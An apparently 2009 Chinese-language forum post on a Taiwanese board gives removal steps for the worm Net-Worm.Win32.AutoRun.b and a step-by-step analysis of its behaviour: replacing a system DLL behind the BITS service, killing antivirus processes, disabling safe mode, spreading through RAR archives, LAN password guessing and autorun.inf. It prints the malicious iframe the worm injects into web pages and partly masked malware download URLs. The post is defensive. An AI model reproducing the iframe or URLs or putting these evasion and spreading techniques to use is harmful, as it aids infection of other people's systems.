廣告廣告
  加入我的最愛 設為首頁 風格修改
首頁 首尾
 手機版   訂閱   地圖  簡體 
您是第 3569 個閱讀者
 
發表文章 發表投票 回覆文章
  可列印版   加為IE收藏   收藏主題   上一主題 | 下一主題   
upside 手機 葫蘆墩家族
個人頭像
個人文章 個人相簿 個人日記 個人地圖
特殊貢獻獎 社區建設獎 優秀管理員勳章
頭銜:反病毒 反詐騙 反虐犬   反病毒 反詐騙 反虐犬  
版主
分享: 轉寄此文章 Facebook Plurk Twitter 複製連結到剪貼簿 轉換為繁體 轉換為簡體 載入圖片
推文 x0
[資訊教學] 网络蠕虫Net-Worm.Win32.AutoRun.b的处理方法
網絡蠕蟲Net-Worm.Win32.AutoRun.b的處理方法
1、手動恢複以下文件:

拷貝相同版本文件到: %SystemRoot%\system32\qmgr.dll
拷貝相同版本文件到: %SystemRoot%\system32\drivers\etc\hosts
手動或用工具清除所有壓縮包中的病毒
手動或用工具恢複所有網頁文件。

2、手動刪除以下文件:
  
%TEMP%\syshost.exe
%TEMP%\TempLocal.txt
%SystemRoot%\system32\1l1.dll
%SystemRoot%\system32\qmgr.dll
%SystemRoot%\System32\dllcache\lsasvc.dll
X:\autorun.inf (X爲所有盤符)
X:\recycle.{645FF040-5081-101B-9F08-00AA002F954E} (X爲所有盤符)
X:\recycle.{645FF040-5081-101B-9F08-00AA002F954E}\Ghost.exe (X爲所有盤符)

3、手動刪除以下注冊表值:
鍵: HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsNT\CurrentVersion\Image File Execution Options\[所有劫持]

4、手動恢複以下注冊表值:

    鍵:HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\BITS
    值: Start
    數據: 0x00000003

  修複安全模式:

鍵:HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal
鍵:HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network

變量聲明:

 %SystemDriver%       係統所在分區,通常爲“C:\”
 %SystemRoot%        WINDODWS所在目錄,通常爲“C:\Windows”
 %Documents and Settings%  用戶文檔目錄,通常爲“C:\Documents and Settings”
 %Temp%           臨時文件夾,通常爲“C:\Documents and Settings\當前用戶名稱\Local Settings\Temp”
 %ProgramFiles%       係統程序默認安裝目錄,通常爲:“C:\ProgramFiles”
病毒分析

(1)停止名爲"BITS"的服務,去掉%SystemRoot%\system32\qmgr.dll文件保護屬性,並釋放動態鏈接
庫%SystemRoot%\system32\qmgr.dll,替換掉正常的qmgr.dll,啓動"BITS"服務,通過該服務加載病毒程序。
(2)檢查%SystemRoot%\system32\qmgr.dll是否被360tray.exe檢測,如果是,則創建一個名爲"360SpShadow0"的設備,通過發送IO控
制碼的方式控制該設備從而繞過360tray.exe的檢測。
(3) 創建線程,獲取當前進程快照,查找進程"avp.exe"、"bdagent.exe"、"360tray.exe"是否存在,如果找到,則
將%SystemRoot%\system32\qmgr.dll複制爲%SystemRoot%\system32\1l1.dll,將%SystemRoot%\system32\1l1.dll注入到目標進
程空間,並將殺軟進程主線程終止,使其進程退出,完成之後,刪除%SystemRoot%\system32\1l1.dll。
(4)創建線程,刪除注冊表相關鍵值,使用戶無法進入安全模式,創建名爲"SvcMain"的服務,釋放驅動%TEMP%\SvcMain.sys並加載,
通過該驅動程序恢複SSDT,完成之後,刪除%TEMP%\SvcMain.sys,並刪除服務對應的注冊表鍵值。之後,刪除大部分殺軟的服務,
並作鏡像劫持。
(5)創建線程,查找所有文件後綴名爲htm、html、asp、aspx的網頁文件,如果找到,往目標文件中插入代碼<iframe
src=http://mm.uu8***7.cn/index/mm.htm width=100 height=0></iframe>,並開啓一個新進程執行%ProgramFiles%\Internet
Explorer\iexplore.exe,通過iexplore.exe訪問嵌入的惡意網址。
(6)創建線程,新建文件%TEMP%\TempLocal.txt,訪問目標網址讀取內容,將讀取的內容寫入TempLocal.txt,並訪問TempLocal.txt文
件中保存的網址,下載新病毒到本地運行。
(7)查找並修改文件%SystemRoot%\System32\drivers\etc\hosts。
(8)釋放文件%SystemRoot%\System32\dllcache\lsasvc.dll,並運行。
(9)創建線程,遍曆所有盤符,查找所有rar壓縮包文件,如果找到,通過調用%ProgramFiles%\WinRAR\Rar.exe程序將其解壓,將 病毒程序複制到解壓出的文件夾中,然後再壓縮回去,完成將病毒添加到壓縮包中的功能。
(10)創建線程,掃描局域網其它主機,並通過自帶的弱口令列表嘗試枚舉其它主機的管理密碼,如果枚舉成功,從指定網址下載病毒程
序到本地執行,並複制到其它主機的所有共享文件夾中運行。
(11)創建線程,遍曆當前所有盤符,在每個盤符下創建文件autorun.inf,並在每個盤符下創建文件夾recycle.{645FF040-5081-101B-9F08-00AA002F954E},並將%SystemRoot%\System32\dllcache\lsasvc.dll重命名爲Ghost.exe複制到
recycle.{645FF040-5081-101B-9F08-00AA002F954E}\Ghost.exe,使用戶一但雙擊磁盤或打開資源管理器自動運行病毒Ghost.exe
(12)創建線程,不斷讀取%TEMP%\TempLocal.txt文件中的網址,下載新病毒。
(13)創建線程,釋放病毒程序%TEMP%\syshost.exe,並開啓新進程執行該程序。
(14) 釋放批處理文件%TEMP%\TempDel.bat,並運行,將病毒自身重命名複制到%SystemRoot%\system32\dllcache\lsasvc.dll,之後刪除自身和TempDel.bat。

病毒創建文件:

%TEMP%\SvcMain.sys
%TEMP%\syshost.exe
%TEMP%\TempLocal.txt
%TEMP%\TempDel.bat
%SystemRoot%\system32\1l1.dll
%SystemRoot%\system32\qmgr.dll
%SystemRoot%\System32\dllcache\lsasvc.dll
X:\autorun.inf (X爲各個盤符)
X:\recycle.{645FF040-5081-101B-9F08-00AA002F954E} (X爲各個盤符)
X:\recycle.{645FF040-5081-101B-9F08-00AA002F954E}\Ghost.exe (X爲各個盤符)

病毒修改文件:

%SystemRoot%\system32\qmgr.dll
%SystemRoot%\system32\drivers\etc\hosts

病毒刪除文件:

%TEMP%\SvcMain.sys
%TEMP%\TempDel.bat

病毒創建進程:

iexplore.exe

病毒創建注冊表:
 
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\[映像劫持]
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SvcMain

病毒修改注冊表:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ BITS\Start

病毒刪除注冊表:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SvcMain
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network

病毒訪問網絡:
 
http://m...uu***67.cn/index/mm.htm
http://w....d***04.com/msn/mm.txt
http://w....d***567.cn/down/qqmm.exe
http://w....d***567.cn/down/qqma.exe



爸爸 你一路好走
獻花 x0 回到頂端 [樓 主] From:臺灣和信超媒體寬帶網 | Posted:2009-10-02 17:59 |

首頁  發表文章 發表投票 回覆文章
Powered by PHPWind v1.3.6
Copyright © 2003-04 PHPWind
Processed in 0.052922 second(s),query:15 Gzip disabled
本站由 瀛睿律師事務所 擔任常年法律顧問 | 免責聲明 | 本網站已依台灣網站內容分級規定處理 | 連絡我們 | 訪客留言